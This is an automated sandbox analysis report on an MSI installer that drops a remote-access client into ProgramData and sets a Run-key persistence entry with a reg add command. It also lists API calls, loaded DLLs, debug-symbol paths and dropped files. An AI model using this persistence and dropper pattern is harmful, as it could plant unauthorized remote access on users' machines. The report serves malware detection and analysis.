Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:37.400] [2b8:1064: 00] DETAIL: VS_PS: process creation: 14b4, parent = 2b8, image filename: "\Device\HarddiskVolume2\Windows\System32\svchost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:33.345] [16c4:1914: 00] DETAIL: VS_PS: process creation: 1e40, parent = 16c4, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:33.707] [ad4:1828: 00] DETAIL: VS_PS: process creation: 1798, parent = ad4, image filename: "\Device\HarddiskVolume2\Program Files\Common Files\Veeam\Backup and Replication\Mount Service\Veeam.Backup.MountService.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.495] [10bc:b6c: 00] DETAIL: VS_PS: process termination: 10bc, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:11:36.602] [340:1e10: 00] DETAIL: VS_PS: process creation: 21fc, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\MoUsoCoreWorker.exe".

Source: classification engine

Classification label: mal68.rans.evad.winMSI@9/52@3/2

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_110ED2B0 GetModuleFileNameA,LoadLibraryExA,LoadLibraryExA,GetSystemDirectoryA,LoadLibraryExA,GetLastError,FormatMessageA,LocalFree,_memmove,

3_2_110ED2B0

Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11095790 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	3_2_11095790
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11095820 AdjustTokenPrivileges,CloseHandle,	3_2_11095820
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11095790 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	6_2_11095790
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11095820 AdjustTokenPrivileges,CloseHandle,	6_2_11095820

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_1108F8C0 CoInitialize,CLSIDFromProgID,CoCreateInstance,CoUninitialize,

3_2_1108F8C0

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_110C3930 IsWindow,IsWindowVisible,SetForegroundWindow,FindResourceExA,LoadResource,LockResource,DialogBoxIndirectParamA,DialogBoxParamA,

3_2_110C3930

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_11119810 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,

3_2_11119810

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\CML9D9D.tmp

Jump to behavior

Source: C:\ProgramData\MScreenConnect\client32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DFB72B0BE5691B5F4E.TMP

Jump to behavior

Source: C:\ProgramData\MScreenConnect\client32.exe

File read: C:\ProgramData\MScreenConnect\client32.ini

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: 72BF1aHUKl.msi

Static file information: TRID: Microsoft Windows Installer (60509/1) 88.31%

Source: 72BF1aHUKl.msi

ReversingLabs: Detection: 15%

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\72BF1aHUKl.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\ProgramData\MScreenConnect\client32.exe "C:\ProgramData\MScreenConnect\client32.exe"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ScreenConnect /t REG_SZ /d "C:\ProgramData\MScreenConnect\client32.exe"
Source: C:\Windows\System32\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\MScreenConnect\client32.exe "C:\ProgramData\MScreenConnect\client32.exe"
Source: unknown	Process created: C:\ProgramData\MScreenConnect\client32.exe "C:\ProgramData\MScreenConnect\client32.exe"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\ProgramData\MScreenConnect\client32.exe "C:\ProgramData\MScreenConnect\client32.exe"	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ScreenConnect /t REG_SZ /d "C:\ProgramData\MScreenConnect\client32.exe"	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msihnd.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: pcihooks.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: riched32.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: pciinv.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\ProgramData\MScreenConnect\client32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{75048700-EF1F-11D0-9888-006097DEACF9}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File written: C:\ProgramData\MScreenConnect\nsm_vpro.ini

Jump to behavior

Source: C:\ProgramData\MScreenConnect\client32.exe

File opened: C:\Windows\SysWOW64\riched32.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 72BF1aHUKl.msi

Static file information: File size 4767744 > 1048576

Source: C:\ProgramData\MScreenConnect\client32.exe

File opened: C:\ProgramData\MScreenConnect\MSVCR100.dll

Jump to behavior

Source:	Binary string: uimanagerbrokerps.pdb source: UIManagerBrokerps.dll.1.dr
Source:	Binary string: ir41_qcx.pdb source: ir41_qcx.dll.1.dr
Source:	Binary string: appverifUI.pdbGCTL source: appverifUI.dll.1.dr
Source:	Binary string: E:\nsmsrc\nsm\1280\1280\ctl32\release_unicode\pcichek.pdb source: client32.exe, 00000003.00000002.4454401118.000000006FBB2000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000006.00000002.2134785054.000000006FBB2000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000008.00000002.2215514219.000000006FBB2000.00000002.00000001.01000000.00000005.sdmp, PCICHEK.DLL.1.dr
Source:	Binary string: ir50_32.pdb source: ir50_32.dll.1.dr
Source:	Binary string: E:\nsmsrc\nsm\1201\1201F2\client32\Release\PCICL32.pdb source: client32.exe, 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000006.00000002.2133725554.0000000011181000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000008.00000002.2214810652.0000000011181000.00000002.00000001.01000000.00000004.sdmp, PCICL32.DLL.1.dr
Source:	Binary string: stub.pdbGCTL source: dpnathlp.dll.1.dr, dpnhupnp.dll.1.dr, dpnlobby.dll.1.dr
Source:	Binary string: icmp.pdbGCTL source: icmp.dll.1.dr
Source:	Binary string: smalldll.pdbGCTL source: dxmasf.dll.1.dr
Source:	Binary string: W:\ws\workspace\VBR\12.1.0\12.1.0\Backup\Veeam.Backup.Model\obj\Release\Veeam.Backup.Model.pdbO source: Veeam.Backup.Model.dll.1.dr
Source:	Binary string: E:\nsmsrc\nsm\1280\1280f12\AudioCapture\Release\AudioCapture.pdb source: AudioCapture.dll.1.dr
Source:	Binary string: icmp.pdb source: icmp.dll.1.dr
Source:	Binary string: winrssrv.pdbGCTL source: winrssrv.dll.1.dr
Source:	Binary string: wiatrace.pdb source: wiatrace.dll.1.dr
Source:	Binary string: E:\nsmsrc\nsm\1280\1280\ctl32\release_unicode\pcicapi.pdb source: client32.exe, 00000003.00000002.4454308321.000000006E0E5000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000006.00000002.2134225146.000000006E0E5000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000008.00000002.2215429065.000000006E0E5000.00000002.00000001.01000000.00000006.sdmp, pcicapi.dll.1.dr
Source:	Binary string: E:\DNA\DNABuilds\DNA450\DNA450F3i1\client32\release_unicode_2015\dnarc.pdb source: client32.exe, 00000003.00000002.4452509174.0000000000832000.00000002.00000001.01000000.00000003.sdmp, client32.exe, 00000003.00000000.2033005646.0000000000832000.00000002.00000001.01000000.00000003.sdmp, client32.exe, 00000006.00000002.2133222658.0000000000832000.00000002.00000001.01000000.00000003.sdmp, client32.exe, 00000006.00000000.2132289855.0000000000832000.00000002.00000001.01000000.00000003.sdmp, client32.exe, 00000008.00000002.2214132599.0000000000832000.00000002.00000001.01000000.00000003.sdmp, client32.exe, 00000008.00000000.2213191011.0000000000832000.00000002.00000001.01000000.00000003.sdmp, client32.exe.1.dr
Source:	Binary string: vfcompat.pdb source: vfcompat.dll.1.dr
Source:	Binary string: smalldll.pdb source: dxmasf.dll.1.dr
Source:	Binary string: E:\nsmsrc\NSN\300\CVA_300F1\Ctl32\release\htctl32.pdb source: client32.exe, 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmp, HTCTL32.DLL.1.dr
Source:	Binary string: winrssrv.pdb source: winrssrv.dll.1.dr
Source:	Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 00000003.00000002.4454151326.000000006CE81000.00000020.00000001.01000000.00000007.sdmp, client32.exe, 00000006.00000002.2134025451.000000006CE81000.00000020.00000001.01000000.00000007.sdmp, client32.exe, 00000008.00000002.2215261938.000000006CE81000.00000020.00000001.01000000.00000007.sdmp, msvcr100.dll.1.dr
Source:	Binary string: appverifUI.pdb source: appverifUI.dll.1.dr
Source:	Binary string: ir50_32.pdbGCTL source: ir50_32.dll.1.dr
Source:	Binary string: uimanagerbrokerps.pdbGCTL source: UIManagerBrokerps.dll.1.dr
Source:	Binary string: vfcompat.pdbGCTL source: vfcompat.dll.1.dr
Source:	Binary string: wiatrace.pdbUGP source: wiatrace.dll.1.dr
Source:	Binary string: WFAPIGP.pdb source: wfapigp.dll.1.dr
Source:	Binary string: W:\ws\workspace\VBR\12.1.0\12.1.0\Backup\Veeam.Backup.Model\obj\Release\Veeam.Backup.Model.pdb source: Veeam.Backup.Model.dll.1.dr
Source:	Binary string: WerEnc.pdb source: WerEnc.dll.1.dr
Source:	Binary string: stub.pdb source: dpnathlp.dll.1.dr, dpnhupnp.dll.1.dr, dpnlobby.dll.1.dr
Source:	Binary string: GetUName.pdbGCTL source: getuname.dll.1.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.1.dr
Source:	Binary string: WFAPIGP.pdbUGP source: wfapigp.dll.1.dr
Source:	Binary string: GetUName.pdb source: getuname.dll.1.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.1.dr
Source:	Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdb source: msvcp140_codecvt_ids.dll.1.dr
Source:	Binary string: WerEnc.pdbGCTL source: WerEnc.dll.1.dr
Source:	Binary string: ir41_qcx.pdbGCTL source: ir41_qcx.dll.1.dr

Source: ir50_32.dll.1.dr

Static PE information: 0xA115F48D [Sun Aug 22 18:03:57 2055 UTC]

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_11081000 LoadLibraryA,LoadLibraryA,GetModuleFileNameA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_11081000

Source: HTCTL32.DLL.1.dr

Static PE information: real checksum: 0x4fbb5 should be: 0x525c4

Source: wfapigp.dll.1.dr	Static PE information: section name: .didat
Source: PCICL32.DLL.1.dr	Static PE information: section name: .hhshare

Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_1115DA35 push ecx; ret	3_2_1115DA48
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11158929 push ecx; ret	3_2_1115893C
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_1115DA35 push ecx; ret	6_2_1115DA48
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11158929 push ecx; ret	6_2_1115893C

Source: msvcr100.dll.1.dr

Static PE information: section name: .text entropy: 6.909044922675825

Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\appverifUI.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\winrssrv.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\wfapigp.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\client32.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\dxmasf.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\dpnlobby.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\winrsmgr.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\UIManagerBrokerps.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\msvcp140_codecvt_ids.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\pcicapi.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\wiatrace.dll	Jump to dropped file
